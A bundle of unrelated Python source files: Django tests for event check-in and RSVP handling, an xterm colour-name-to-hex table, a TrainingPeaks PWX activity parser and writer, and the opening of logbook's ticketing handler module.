            ctx['immediate_events']['event_infos'][0]['user_is_registered'])

    def test_other_user(self):
        ctx = self._page_context(self.other_user)
        self.assertEqual(1, len(ctx['all_events']['event_infos']))
        self.assertEqual(0, len(ctx['immediate_events']['event_infos']))
        self.assertFalse(
            ctx['all_events']['event_infos'][0]['user_is_registered'])
class EventEmailTest(EventTestCase):
    def test_sending_email(self):
        """Mailing an event's attendees delivers and reports success."""
        EventRegistration(event=self.event, user=self.user).clean_and_save()
        post_data = {
            'subject': 'Come to the event',
            'body': "It's happening now!",
        }
        request = make_request(post_data, self.other_user, 'POST',
                               group=self.group)
        context = event_email(request, self.event.slug)
        self.assertEqual("Come to the event", mail.outbox[0].subject)
        self.assertTrue(context['message_sent'])
        self.assertEqual(self.event, context['event'])
        self.assertEqual(self.group, context['group'])
        # Clear the test inbox
        mail.outbox = []
class CheckinEventTest(EventTestCase):
    """Check-in/check-out flow, RSVP limits, and event timing helpers.

    Fix: the timing tests used ``xrange``, which does not exist on
    Python 3 (the module's ``__future__`` imports indicate 2/3
    compatibility is intended); ``range`` iterates identically here.
    """

    def _assert_num_checkins(self, expected_amount):
        """Assert the admin check-in page reports exactly this many check-ins."""
        request = make_request(user=self.user, group=self.group)
        context = event_admin_check_in_page(request, self.event.slug)
        self.assertEqual(self.event, context['event'])
        self.assertEqual(self.group, context['group'])
        checkins = sum(1 if did_attend else 0
                       for user, did_attend in context['users'])
        self.assertEqual(expected_amount, checkins)

    def test_checkin_checkout(self):
        """Check-in requires an RSVP; DELETE undoes a check-in."""
        self._assert_num_checkins(0)
        request = partial(make_request, user=self.user, group=self.group)
        # Checkin (should fail because user has not RSVPed yet)
        context = check_in_user_to_event(request(method='POST'),
                                         self.event.slug,
                                         self.user.username)
        self.assertTrue(isinstance(context, HttpResponseForbidden))
        # RSVP
        register_for_event(request(method='POST'), self.event.slug)
        # Checkin again (should succeed this time)
        check_in_user_to_event(request(method='POST'),
                               self.event.slug,
                               self.user.username)
        self._assert_num_checkins(1)
        # Un-Checkin
        check_in_user_to_event(request(method='DELETE'),
                               self.event.slug,
                               self.user.username)
        self._assert_num_checkins(0)

    def test_rsvp_limit_increase(self):
        """Each call bumps the limit by 5 and persists it on the event."""
        request = make_request(user=self.user, group=self.group)
        self.event.max_attendees = 0
        self.event.save()
        self.event = Event.objects.get(id=self.event.id)
        self.assertEqual(0, self.event.max_attendees)
        # De-duplicated from three copy-pasted blocks: 0 -> 5 -> 10 -> 15.
        for expected in (5, 10, 15):
            context = increase_rsvp_limit(request, self.event.slug)
            self.event = Event.objects.get(id=self.event.id)
            self.assertEqual(expected, context['max_attendees'])
            self.assertEqual(expected, self.event.max_attendees)

    def test_starting_soon(self):
        """starting_soon() is True from one hour before start until the end."""
        tz = timezone.get_current_timezone()
        event = Event(begins_at=datetime(2015, 1, 13, hour=12, tzinfo=tz),
                      ends_at=datetime(2015, 1, 13, hour=13, tzinfo=tz))
        dt = datetime(2015, 1, 13, hour=10, minute=59, tzinfo=tz)
        self.assertFalse(event.starting_soon(dt))
        # From hour=10, minute=59
        # to hour=12, minute=59
        for i in range(120):  # was xrange: NameError on Python 3
            dt = dt + timedelta(minutes=1)
            self.assertTrue(event.starting_soon(dt))
        # hour=13, minute=0
        dt = dt + timedelta(minutes=1)
        self.assertFalse(event.starting_soon(dt))

    def test_in_progress(self):
        """in_progress() is True from the start time until the end."""
        tz = timezone.get_current_timezone()
        event = Event(begins_at=datetime(2015, 1, 13, hour=12, tzinfo=tz),
                      ends_at=datetime(2015, 1, 13, hour=13, tzinfo=tz))
        dt = datetime(2015, 1, 13, hour=11, minute=59, tzinfo=tz)
        self.assertFalse(event.in_progress(dt))
        # From hour=11, minute=59
        # to hour=12, minute=59
        for i in range(60):  # was xrange: NameError on Python 3
            dt = dt + timedelta(minutes=1)
            self.assertTrue(event.in_progress(dt))
        # hour=13, minute=0
        dt = dt + timedelta(minutes=1)
        self.assertFalse(event.in_progress(dt))

    def test_field_training_complete(self):
        """Only training events flip the user's field_training_complete flag."""
        request = make_request(user=self.user, group=self.group, method='POST')
        user = self.user
        user.field_training_complete = False
        user.clean_and_save()
        # RSVP
        register_for_event(request, self.event.slug)
        # Check-in user to normal event
        self.event.includes_training = False
        self.event.clean_and_save()
        check_in_user_to_event(request, self.event.slug, self.user.username)
        user = User.objects.get(id=user.id)
        self.assertEqual(False, user.field_training_complete)
        # Check-in user to training event
        self.event.includes_training = True
        self.event.clean_and_save()
        check_in_user_to_event(request, self.event.slug, self.user.username)
        user = User.objects.get(id=user.id)
        self.assertEqual(True, user.field_training_complete)

    def test_user_checkin_poll(self):
        """The poll endpoint reflects whether the user has checked in."""
        partial_request = partial(make_request, user=self.user,
                                  group=self.group, event=self.event)
        # RSVP
        register_for_event(partial_request(method='POST'), self.event.slug)
        response = event_user_check_in_poll(partial_request(), self.event.slug)
        self.assertFalse(response['checked_in'])
        # Check-in to event
        check_in_user_to_event(partial_request(method='POST'),
                               self.event.slug,
                               self.user.username)
        response = event_user_check_in_poll(partial_request(), self.event.slug)
        self.assertTrue(response['checked_in'])
class MyEventsNowTestCase(UsersTestCase):
    """Coverage for EventRegistration.my_events_now and Event.has_started."""

    def _make_event(self, start_delta, end_delta):
        # Deltas are in hours relative to "now".
        base = timezone.now()
        return make_event(self.group,
                          begins_at=base + timedelta(hours=start_delta),
                          ends_at=base + timedelta(hours=end_delta))

    def _get_my_events_now(self, start_delta, end_delta, **kwargs):
        registration = {
            'event': self._make_event(start_delta, end_delta),
            'user': self.user,
        }
        registration.update(kwargs)
        EventRegistration.objects.create(**registration)
        return EventRegistration.my_events_now(self.user)

    def assert_included(self, start_delta, end_delta, **kwargs):
        self.assertEqual(
            1, len(self._get_my_events_now(start_delta, end_delta, **kwargs)))

    def assert_excluded(self, start_delta, end_delta, **kwargs):
        self.assertEqual(
            0, len(self._get_my_events_now(start_delta, end_delta, **kwargs)))

    def test_included_if_starting_now(self):
        self.assert_included(+0, +1)

    def test_excluded_if_ended_3_hours_ago(self):
        self.assert_excluded(-4, -3)

    def test_excluded_if_ended_6_hours_ago(self):
        self.assert_excluded(-7, -6)

    def test_excluded_if_starting_in_6_hours(self):
        self.assert_excluded(+6, +7)

    def test_excluded_if_checked_in(self):
        self.assert_excluded(+0, +1, did_attend=True)

    def test_excluded_if_not_registered(self):
        self.assert_excluded(+0, +1, user=self.other_user)

    def test_has_started(self):
        self.assertTrue(self._make_event(-1, +1).has_started)

    def test_has_not_started(self):
        self.assertFalse(self._make_event(+3, +5).has_started)
| |
# Mapping of color names to their hex RGB values, sorted alphabetically
# by name.  NOTE(review): values look like the xterm-256 named palette
# (components drawn from 00/5f/87/af/d7/ff plus the 16 basic/web colors
# and the Grey ramp) — confirm against the consumer before relying on it.
# Do not reorder: dict iteration order is insertion order on Python 3.7+.
termcolors = {
    'Aqua': '#00ffff',
    'Aquamarine1': '#87ffd7',
    'Aquamarine3': '#5fd7af',
    'Black': '#000000',
    'Blue': '#0000ff',
    'Blue1': '#0000ff',
    'Blue3': '#0000d7',
    'BlueViolet': '#5f00ff',
    'CadetBlue': '#5fafaf',
    'Chartreuse1': '#87ff00',
    'Chartreuse2': '#87d700',
    'Chartreuse3': '#5fd700',
    'Chartreuse4': '#5f8700',
    'CornflowerBlue': '#5f87ff',
    'Cornsilk1': '#ffffd7',
    'Cyan1': '#00ffff',
    'Cyan2': '#00ffd7',
    'Cyan3': '#00d7af',
    'DarkBlue': '#000087',
    'DarkCyan': '#00af87',
    'DarkGoldenrod': '#af8700',
    'DarkGreen': '#005f00',
    'DarkKhaki': '#afaf5f',
    'DarkMagenta': '#8700af',
    'DarkOliveGreen1': '#d7ff87',
    'DarkOliveGreen2': '#afff5f',
    'DarkOliveGreen3': '#afd75f',
    'DarkOrange': '#ff8700',
    'DarkOrange3': '#d75f00',
    'DarkRed': '#870000',
    'DarkSeaGreen': '#87af87',
    'DarkSeaGreen1': '#d7ffaf',
    'DarkSeaGreen2': '#afffaf',
    'DarkSeaGreen3': '#afd787',
    'DarkSeaGreen4': '#5faf5f',
    'DarkSlateGray1': '#87ffff',
    'DarkSlateGray2': '#5fffff',
    'DarkSlateGray3': '#87d7d7',
    'DarkTurquoise': '#00d7d7',
    'DarkViolet': '#af00d7',
    'DeepPink1': '#ff00af',
    'DeepPink2': '#ff005f',
    'DeepPink3': '#d70087',
    'DeepPink4': '#af005f',
    'DeepSkyBlue1': '#00afff',
    'DeepSkyBlue2': '#00afd7',
    'DeepSkyBlue3': '#0087d7',
    'DeepSkyBlue4': '#005faf',
    'DodgerBlue1': '#0087ff',
    'DodgerBlue2': '#005fff',
    'DodgerBlue3': '#005fd7',
    'Fuchsia': '#ff00ff',
    'Gold1': '#ffd700',
    'Gold3': '#d7af00',
    'Green': '#008000',
    'Green1': '#00ff00',
    'Green3': '#00d700',
    'Green4': '#008700',
    'GreenYellow': '#afff00',
    'Grey': '#808080',
    'Grey0': '#000000',
    'Grey100': '#ffffff',
    'Grey11': '#1c1c1c',
    'Grey15': '#262626',
    'Grey19': '#303030',
    'Grey23': '#3a3a3a',
    'Grey27': '#444444',
    'Grey3': '#080808',
    'Grey30': '#4e4e4e',
    'Grey35': '#585858',
    'Grey37': '#5f5f5f',
    'Grey39': '#626262',
    'Grey42': '#6c6c6c',
    'Grey46': '#767676',
    'Grey50': '#808080',
    'Grey53': '#878787',
    'Grey54': '#8a8a8a',
    'Grey58': '#949494',
    'Grey62': '#9e9e9e',
    'Grey63': '#af87af',
    'Grey66': '#a8a8a8',
    'Grey69': '#afafaf',
    'Grey7': '#121212',
    'Grey70': '#b2b2b2',
    'Grey74': '#bcbcbc',
    'Grey78': '#c6c6c6',
    'Grey82': '#d0d0d0',
    'Grey84': '#d7d7d7',
    'Grey85': '#dadada',
    'Grey89': '#e4e4e4',
    'Grey93': '#eeeeee',
    'Honeydew2': '#d7ffd7',
    'HotPink': '#ff5fd7',
    'HotPink2': '#d75faf',
    'HotPink3': '#d75f87',
    'IndianRed': '#d75f5f',
    'IndianRed1': '#ff5f87',
    'Khaki1': '#ffff87',
    'Khaki3': '#d7d75f',
    'LightCoral': '#ff8787',
    'LightCyan1': '#d7ffff',
    'LightCyan3': '#afd7d7',
    'LightGoldenrod1': '#ffff5f',
    'LightGoldenrod2': '#ffd787',
    'LightGoldenrod3': '#d7af5f',
    'LightGreen': '#87ff87',
    'LightPink1': '#ffafaf',
    'LightPink3': '#d78787',
    'LightPink4': '#875f5f',
    'LightSalmon1': '#ffaf87',
    'LightSalmon3': '#d7875f',
    'LightSeaGreen': '#00afaf',
    'LightSkyBlue1': '#afd7ff',
    'LightSkyBlue3': '#87afd7',
    'LightSlateBlue': '#8787ff',
    'LightSlateGrey': '#8787af',
    'LightSteelBlue': '#afafff',
    'LightSteelBlue1': '#d7d7ff',
    'LightSteelBlue3': '#afafd7',
    'LightYellow3': '#d7d7af',
    'Lime': '#00ff00',
    'Magenta1': '#ff00ff',
    'Magenta2': '#ff00d7',
    'Magenta3': '#d700d7',
    'Maroon': '#800000',
    'MediumOrchid': '#af5fd7',
    'MediumOrchid1': '#ff5fff',
    'MediumOrchid3': '#af5faf',
    'MediumPurple': '#8787d7',
    'MediumPurple1': '#af87ff',
    'MediumPurple2': '#af87d7',
    'MediumPurple3': '#875fd7',
    'MediumPurple4': '#5f5f87',
    'MediumSpringGreen': '#00ffaf',
    'MediumTurquoise': '#5fd7d7',
    'MediumVioletRed': '#af0087',
    'MistyRose1': '#ffd7d7',
    'MistyRose3': '#d7afaf',
    'NavajoWhite1': '#ffd7af',
    'NavajoWhite3': '#afaf87',
    'Navy': '#000080',
    'NavyBlue': '#00005f',
    'Olive': '#808000',
    'Orange1': '#ffaf00',
    'Orange3': '#d78700',
    'Orange4': '#875f00',
    'OrangeRed1': '#ff5f00',
    'Orchid': '#d75fd7',
    'Orchid1': '#ff87ff',
    'Orchid2': '#ff87d7',
    'PaleGreen1': '#afff87',
    'PaleGreen3': '#87d787',
    'PaleTurquoise1': '#afffff',
    'PaleTurquoise4': '#5f8787',
    'PaleVioletRed1': '#ff87af',
    'Pink1': '#ffafd7',
    'Pink3': '#d787af',
    'Plum1': '#ffafff',
    'Plum2': '#d7afff',
    'Plum3': '#d787d7',
    'Plum4': '#875f87',
    'Purple': '#af00ff',
    'Purple3': '#5f00d7',
    'Purple4': '#5f00af',
    'Red': '#ff0000',
    'Red1': '#ff0000',
    'Red3': '#d70000',
    'RosyBrown': '#af8787',
    'RoyalBlue1': '#5f5fff',
    'Salmon1': '#ff875f',
    'SandyBrown': '#ffaf5f',
    'SeaGreen1': '#5fffaf',
    'SeaGreen2': '#5fff5f',
    'SeaGreen3': '#5fd787',
    'Silver': '#c0c0c0',
    'SkyBlue1': '#87d7ff',
    'SkyBlue2': '#87afff',
    'SkyBlue3': '#5fafd7',
    'SlateBlue1': '#875fff',
    'SlateBlue3': '#5f5fd7',
    'SpringGreen1': '#00ff87',
    'SpringGreen2': '#00ff5f',
    'SpringGreen3': '#00d75f',
    'SpringGreen4': '#00875f',
    'SteelBlue': '#5f87af',
    'SteelBlue1': '#5fd7ff',
    'SteelBlue3': '#5f87d7',
    'Tan': '#d7af87',
    'Teal': '#008080',
    'Thistle1': '#ffd7ff',
    'Thistle3': '#d7afd7',
    'Turquoise2': '#00d7ff',
    'Turquoise4': '#008787',
    'Violet': '#d787ff',
    'Wheat1': '#ffffaf',
    'Wheat4': '#87875f',
    'White': '#ffffff',
    'Yellow': '#ffff00',
    'Yellow1': '#ffff00',
    'Yellow2': '#d7ff00',
    'Yellow3': '#d7d700',
    'Yellow4': '#87af00'
}
| |
from lxml import etree
import copy
import dateutil.parser
from datetime import timedelta
from .interchange import WaypointType, ActivityType, Activity, Waypoint, Location, Lap, ActivityStatistic, ActivityStatisticUnit
class PWXIO:
    """Reads and writes TrainingPeaks PWX activity files.

    ``Parse`` and ``Dump`` are written as plain functions in the class
    body (no ``@staticmethod``) and are invoked as ``PWXIO.Parse(...)`` /
    ``PWXIO.Dump(...)`` — valid on Python 3, where class-body functions
    accessed via the class are ordinary functions.
    """

    # Default XML namespace of the PWX schema.
    Namespaces = {
        None: "http://www.peaksware.com/PWX/1/0"
    }

    # PWX sportType text -> interchange ActivityType.
    _sportTypeMappings = {
        "Bike": ActivityType.Cycling,
        "Run": ActivityType.Running,
        "Walk": ActivityType.Walking,
        "Swim": ActivityType.Swimming,
        "Mountain Bike": ActivityType.MountainBiking,
        "XC Ski": ActivityType.CrossCountrySkiing,
        "Rowing": ActivityType.Rowing,
        "Other": ActivityType.Other
    }

    # ActivityType -> PWX sportType text (lossy: several types collapse).
    _reverseSportTypeMappings = {
        ActivityType.Cycling: "Bike",
        ActivityType.Running: "Run",
        ActivityType.Walking: "Walk",
        ActivityType.Hiking: "Walk",  # Hilly walking?
        ActivityType.Swimming: "Swim",
        ActivityType.MountainBiking: "Mountain Bike",
        ActivityType.CrossCountrySkiing: "XC Ski",
        ActivityType.DownhillSkiing: "XC Ski",  # For whatever reason there's no "ski" type
        ActivityType.Rowing: "Rowing",
        ActivityType.Other: "Other",
    }

    def Parse(pwxData, activity=None):
        """Parse PWX XML into an Activity (given or freshly created).

        Raises ValueError when the workout has no <time> element.
        """
        ns = copy.deepcopy(PWXIO.Namespaces)
        # lxml's find() can't use the None-keyed default namespace; remap
        # it to an explicit "pwx" prefix for the XPath lookups below.
        ns["pwx"] = ns[None]
        del ns[None]

        activity = activity if activity else Activity()

        try:
            root = etree.XML(pwxData)
        except:
            # Fall back for inputs etree.XML rejects (e.g. str with an
            # encoding declaration).
            root = etree.fromstring(pwxData)

        xworkout = root.find("pwx:workout", namespaces=ns)

        xsportType = xworkout.find("pwx:sportType", namespaces=ns)
        if xsportType is not None:
            sportType = xsportType.text
            if sportType in PWXIO._sportTypeMappings:
                # "Other" is the mapping's catch-all; keep whatever type
                # the caller's activity already has in that case.
                if PWXIO._sportTypeMappings[sportType] != ActivityType.Other:
                    activity.Type = PWXIO._sportTypeMappings[sportType]

        xtitle = xworkout.find("pwx:title", namespaces=ns)
        if xtitle is not None:
            activity.Name = xtitle.text

        xcmt = xworkout.find("pwx:cmt", namespaces=ns)
        if xcmt is not None:
            activity.Notes = xcmt.text

        xtime = xworkout.find("pwx:time", namespaces=ns)
        if xtime is None:
            raise ValueError("Can't parse PWX without time")

        activity.StartTime = dateutil.parser.parse(xtime.text)
        # Flipped to True below if any sample carries a latitude.
        activity.GPS = False

        def _minMaxAvg(xminMaxAvg):
            # min/max/avg attributes are all optional in the schema.
            return {"min": float(xminMaxAvg.attrib["min"]) if "min" in xminMaxAvg.attrib else None, "max": float(xminMaxAvg.attrib["max"]) if "max" in xminMaxAvg.attrib else None, "avg": float(xminMaxAvg.attrib["avg"]) if "avg" in xminMaxAvg.attrib else None} # Most useful line ever

        def _readSummaryData(xsummary, obj, time_ref):
            """Populate obj.StartTime/EndTime/Stats from a <summarydata>.

            *obj* is either the Activity or a Lap; offsets in the XML are
            seconds relative to *time_ref* (the activity start).
            """
            obj.StartTime = time_ref + timedelta(seconds=float(xsummary.find("pwx:beginning", namespaces=ns).text))
            obj.EndTime = obj.StartTime + timedelta(seconds=float(xsummary.find("pwx:duration", namespaces=ns).text))
            # "duration - durationstopped = moving time. duration stopped may be zero." - Ben
            stoppedEl = xsummary.find("pwx:durationstopped", namespaces=ns)
            if stoppedEl is not None:
                obj.Stats.TimerTime = ActivityStatistic(ActivityStatisticUnit.Seconds, value=(obj.EndTime - obj.StartTime).total_seconds() - float(stoppedEl.text))
            else:
                obj.Stats.TimerTime = ActivityStatistic(ActivityStatisticUnit.Seconds, value=(obj.EndTime - obj.StartTime).total_seconds())

            hrEl = xsummary.find("pwx:hr", namespaces=ns)
            if hrEl is not None:
                obj.Stats.HR = ActivityStatistic(ActivityStatisticUnit.BeatsPerMinute, **_minMaxAvg(hrEl))

            spdEl = xsummary.find("pwx:spd", namespaces=ns)
            if spdEl is not None:
                obj.Stats.Speed = ActivityStatistic(ActivityStatisticUnit.MetersPerSecond, **_minMaxAvg(spdEl))

            pwrEl = xsummary.find("pwx:pwr", namespaces=ns)
            if pwrEl is not None:
                obj.Stats.Power = ActivityStatistic(ActivityStatisticUnit.Watts, **_minMaxAvg(pwrEl))

            cadEl = xsummary.find("pwx:cad", namespaces=ns)
            if cadEl is not None:
                obj.Stats.Cadence = ActivityStatistic(ActivityStatisticUnit.RevolutionsPerMinute, **_minMaxAvg(cadEl))

            distEl = xsummary.find("pwx:dist", namespaces=ns)
            if distEl is not None:
                obj.Stats.Distance = ActivityStatistic(ActivityStatisticUnit.Meters, value=float(distEl.text))

            altEl = xsummary.find("pwx:alt", namespaces=ns)
            if altEl is not None:
                obj.Stats.Elevation = ActivityStatistic(ActivityStatisticUnit.Meters, **_minMaxAvg(altEl))

            # Gain/loss live in separate elements; merge them into the
            # elevation statistic rather than replacing it.
            climbEl = xsummary.find("pwx:climbingelevation", namespaces=ns)
            if climbEl is not None:
                obj.Stats.Elevation.update(ActivityStatistic(ActivityStatisticUnit.Meters, gain=float(climbEl.text)))

            descEl = xsummary.find("pwx:descendingelevation", namespaces=ns)
            if descEl is not None:
                obj.Stats.Elevation.update(ActivityStatistic(ActivityStatisticUnit.Meters, loss=float(descEl.text)))

            tempEl = xsummary.find("pwx:temp", namespaces=ns)
            if tempEl is not None:
                obj.Stats.Temperature = ActivityStatistic(ActivityStatisticUnit.DegreesCelcius, **_minMaxAvg(tempEl))

        _readSummaryData(xworkout.find("pwx:summarydata", namespaces=ns), activity, time_ref=activity.StartTime)

        laps = []
        xsegments = xworkout.findall("pwx:segment", namespaces=ns)
        for xsegment in xsegments:
            lap = Lap()
            _readSummaryData(xsegment.find("pwx:summarydata", namespaces=ns), lap, time_ref=activity.StartTime)
            laps.append(lap)

        if len(laps) == 1:
            # Single-lap activity: lap stats and activity stats are one.
            laps[0].Stats.update(activity.Stats)
            activity.Stats = laps[0].Stats
        elif not len(laps):
            # No segments at all: synthesize one lap spanning the activity.
            laps = [Lap(startTime=activity.StartTime, endTime=activity.EndTime, stats=activity.Stats)]

        xsamples = xworkout.findall("pwx:sample", namespaces=ns)

        currentLapIdx = 0
        for xsample in xsamples:
            wp = Waypoint()
            wp.Timestamp = activity.StartTime + timedelta(seconds=float(xsample.find("pwx:timeoffset", namespaces=ns).text))
            # Just realized how terribly inefficient doing the search-if-set pattern is. I'll change everything over to iteration... eventually
            for xsampleData in xsample:
                tag = xsampleData.tag[34:] # {http://www.peaksware.com/PWX/1/0} is 34 chars. I'll show myself out.
                if tag == "hr":
                    wp.HR = int(xsampleData.text)
                elif tag == "spd":
                    wp.Speed = float(xsampleData.text)
                elif tag == "pwr":
                    wp.Power = float(xsampleData.text)
                elif tag == "cad":
                    wp.Cadence = int(xsampleData.text)
                elif tag == "dist":
                    wp.Distance = float(xsampleData.text)
                elif tag == "temp":
                    wp.Temp = float(xsampleData.text)
                elif tag == "alt":
                    if wp.Location is None:
                        wp.Location = Location()
                    wp.Location.Altitude = float(xsampleData.text)
                elif tag == "lat":
                    if wp.Location is None:
                        wp.Location = Location()
                    wp.Location.Latitude = float(xsampleData.text)
                elif tag == "lon":
                    if wp.Location is None:
                        wp.Location = Location()
                    wp.Location.Longitude = float(xsampleData.text)
            assert wp.Location is None or ((wp.Location.Latitude is None) == (wp.Location.Longitude is None)) # You never know...
            if wp.Location and wp.Location.Latitude is not None:
                activity.GPS = True
            # If we've left one lap, move to the next immediately
            while currentLapIdx < len(laps) - 1 and wp.Timestamp > laps[currentLapIdx].EndTime:
                currentLapIdx += 1
            laps[currentLapIdx].Waypoints.append(wp)
        activity.Laps = laps
        activity.Stationary = activity.CountTotalWaypoints() == 0
        if not activity.Stationary:
            flatWp = activity.GetFlatWaypoints()
            flatWp[0].Type = WaypointType.Start
            flatWp[-1].Type = WaypointType.End
            if activity.EndTime < flatWp[-1].Timestamp: # Work around the fact that TP doesn't preserve elapsed time.
                activity.EndTime = flatWp[-1].Timestamp
        return activity

    def Dump(activity):
        """Serialize an Activity to a PWX XML string (UTF-8 text)."""
        xroot = etree.Element("pwx", nsmap=PWXIO.Namespaces)
        xroot.attrib["creator"] = "tapiriik"
        xroot.attrib["version"] = "1.0"

        xworkout = etree.SubElement(xroot, "workout")

        if activity.Type in PWXIO._reverseSportTypeMappings:
            etree.SubElement(xworkout, "sportType").text = PWXIO._reverseSportTypeMappings[activity.Type]

        if activity.Name:
            etree.SubElement(xworkout, "title").text = activity.Name

        if activity.Notes:
            etree.SubElement(xworkout, "cmt").text = activity.Notes

        xdevice = etree.SubElement(xworkout, "device")

        # By Ben's request
        etree.SubElement(xdevice, "make").text = "tapiriik"

        if hasattr(activity, "SourceConnection"):
            etree.SubElement(xdevice, "model").text = activity.SourceConnection.Service.ID

        # PWX times are naive local/UTC per upstream convention —
        # presumably the reader treats them consistently; tz is stripped.
        etree.SubElement(xworkout, "time").text = activity.StartTime.replace(tzinfo=None).isoformat()

        def _writeMinMaxAvg(xparent, name, stat, naturalValue=False):
            # NOTE(review): naturalValue is currently unused.
            if stat.Min is None and stat.Max is None and stat.Average is None:
                return
            xstat = etree.SubElement(xparent, name)
            if stat.Min is not None:
                xstat.attrib["min"] = str(stat.Min)
            if stat.Max is not None:
                xstat.attrib["max"] = str(stat.Max)
            if stat.Average is not None:
                xstat.attrib["avg"] = str(stat.Average)

        def _writeSummaryData(xparent, obj, time_ref):
            """Emit a <summarydata> for the Activity or a Lap, with offsets
            in seconds relative to *time_ref*."""
            xsummary = etree.SubElement(xparent, "summarydata")
            etree.SubElement(xsummary, "beginning").text = str((obj.StartTime - time_ref).total_seconds())
            etree.SubElement(xsummary, "duration").text = str((obj.EndTime - obj.StartTime).total_seconds())
            if obj.Stats.TimerTime.Value is not None:
                # Inverse of the parse-side formula: stopped = elapsed - moving.
                etree.SubElement(xsummary, "durationstopped").text = str((obj.EndTime - obj.StartTime).total_seconds() - obj.Stats.TimerTime.asUnits(ActivityStatisticUnit.Seconds).Value)
            altStat = obj.Stats.Elevation.asUnits(ActivityStatisticUnit.Meters)
            _writeMinMaxAvg(xsummary, "hr", obj.Stats.HR.asUnits(ActivityStatisticUnit.BeatsPerMinute))
            _writeMinMaxAvg(xsummary, "spd", obj.Stats.Speed.asUnits(ActivityStatisticUnit.MetersPerSecond))
            _writeMinMaxAvg(xsummary, "pwr", obj.Stats.Power.asUnits(ActivityStatisticUnit.Watts))
            # Prefer crank cadence; fall back to run cadence when absent.
            if obj.Stats.Cadence.Min is not None or obj.Stats.Cadence.Max is not None or obj.Stats.Cadence.Average is not None:
                _writeMinMaxAvg(xsummary, "cad", obj.Stats.Cadence.asUnits(ActivityStatisticUnit.RevolutionsPerMinute))
            else:
                _writeMinMaxAvg(xsummary, "cad", obj.Stats.RunCadence.asUnits(ActivityStatisticUnit.StepsPerMinute))
            if obj.Stats.Distance.Value:
                etree.SubElement(xsummary, "dist").text = str(obj.Stats.Distance.asUnits(ActivityStatisticUnit.Meters).Value)
            _writeMinMaxAvg(xsummary, "alt", altStat)
            _writeMinMaxAvg(xsummary, "temp", obj.Stats.Temperature.asUnits(ActivityStatisticUnit.DegreesCelcius))
            if altStat.Gain is not None:
                etree.SubElement(xsummary, "climbingelevation").text = str(altStat.Gain)
            if altStat.Loss is not None:
                etree.SubElement(xsummary, "descendingelevation").text = str(altStat.Loss)

        _writeSummaryData(xworkout, activity, time_ref=activity.StartTime)

        for lap in activity.Laps:
            xsegment = etree.SubElement(xworkout, "segment")
            _writeSummaryData(xsegment, lap, time_ref=activity.StartTime)

        for wp in activity.GetFlatWaypoints():
            xsample = etree.SubElement(xworkout, "sample")
            etree.SubElement(xsample, "timeoffset").text = str((wp.Timestamp - activity.StartTime).total_seconds())
            if wp.HR is not None:
                etree.SubElement(xsample, "hr").text = str(round(wp.HR))
            if wp.Speed is not None:
                etree.SubElement(xsample, "spd").text = str(wp.Speed)
            if wp.Power is not None:
                etree.SubElement(xsample, "pwr").text = str(round(wp.Power))
            if wp.Cadence is not None:
                etree.SubElement(xsample, "cad").text = str(round(wp.Cadence))
            else:
                if wp.RunCadence is not None:
                    etree.SubElement(xsample, "cad").text = str(round(wp.RunCadence))
            if wp.Distance is not None:
                etree.SubElement(xsample, "dist").text = str(wp.Distance)
            if wp.Location is not None:
                # Parse() asserts lat/lon are set together, so checking
                # Longitude alone is sufficient here.
                if wp.Location.Longitude is not None:
                    etree.SubElement(xsample, "lat").text = str(wp.Location.Latitude)
                    etree.SubElement(xsample, "lon").text = str(wp.Location.Longitude)
                if wp.Location.Altitude is not None:
                    etree.SubElement(xsample, "alt").text = str(wp.Location.Altitude)
            if wp.Temp is not None:
                etree.SubElement(xsample, "temp").text = str(wp.Temp)
        return etree.tostring(xroot, pretty_print=True, xml_declaration=True, encoding="UTF-8").decode("UTF-8")
| |
# -*- coding: utf-8 -*-
"""
logbook.ticketing
~~~~~~~~~~~~~~~~~
Implements long handlers that write to remote data stores and assign
each logging message a ticket id.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
from time import time
import json
from logbook.base import NOTSET, level_name_property, LogRecord
from logbook.handlers import Handler, HashingHandlerMixin
from logbook.helpers import cached_property, b, PY2, u
from sqlalchemy.orm import sessionmaker, scoped_session
class Ticket(object):
    """Represents a ticket from the database."""

    level_name = level_name_property()

    def __init__(self, db, row):
        self.db = db
        # Adopt all row columns (ticket_id, solved, ...) as attributes.
        self.__dict__.update(row)

    @cached_property
    def last_occurrence(self):
        """The most recent occurrence, or None when there is none."""
        occurrences = self.get_occurrences(limit=1)
        if occurrences:
            return occurrences[0]

    def get_occurrences(self, order_by='-time', limit=50, offset=0):
        """Returns the occurrences for this ticket."""
        return self.db.get_occurrences(self.ticket_id, order_by, limit, offset)

    def solve(self):
        """Marks this ticket as solved."""
        self.db.solve_ticket(self.ticket_id)
        self.solved = True

    def delete(self):
        """Deletes the ticket from the database."""
        self.db.delete_ticket(self.ticket_id)

    # Tickets compare by value, so mark them unhashable.
    # Silence DeprecationWarning
    __hash__ = None

    def __eq__(self, other):
        """Value equality over every attribute this ticket carries."""
        return all(getattr(self, key) == getattr(other, key)
                   for key in self.__dict__)

    def __ne__(self, other):
        return not self.__eq__(other)
class Occurrence(LogRecord):
    """Represents an occurrence of a ticket."""

    def __init__(self, db, row):
        # Rehydrate the base LogRecord from the serialized JSON payload
        # first, then attach the database bookkeeping columns.
        self.update_from_dict(json.loads(row['data']))
        self.db = db
        self.time = row['time']
        self.ticket_id = row['ticket_id']
        self.occurrence_id = row['occurrence_id']
class BackendBase(object):
    """Abstract interface that concrete ticketing backends implement.

    Keyword options are stored on the instance and interpreted by the
    subclass's ``setup_backend``, which runs during construction.
    """

    def __init__(self, **options):
        self.options = options
        self.setup_backend()

    def setup_backend(self):
        """Setup the database backend."""
        raise NotImplementedError()

    def record_ticket(self, record, data, hash, app_id):
        """Records a log record as ticket."""
        raise NotImplementedError()

    def count_tickets(self):
        """Returns the number of tickets."""
        raise NotImplementedError()

    def get_tickets(self, order_by='-last_occurrence_time', limit=50,
                    offset=0):
        """Selects tickets from the database."""
        raise NotImplementedError()

    def solve_ticket(self, ticket_id):
        """Marks a ticket as solved."""
        raise NotImplementedError()

    def delete_ticket(self, ticket_id):
        """Deletes a ticket from the database."""
        raise NotImplementedError()

    def get_ticket(self, ticket_id):
        """Return a single ticket with all occurrences."""
        raise NotImplementedError()

    def get_occurrences(self, ticket, order_by='-time', limit=50, offset=0):
        """Selects occurrences from the database for a ticket."""
        raise NotImplementedError()
class SQLAlchemyBackend(BackendBase):
"""Implements a backend that is writing into a database SQLAlchemy can
interface.
This backend takes some additional options:
`table_prefix`
an optional table prefix for all tables created by
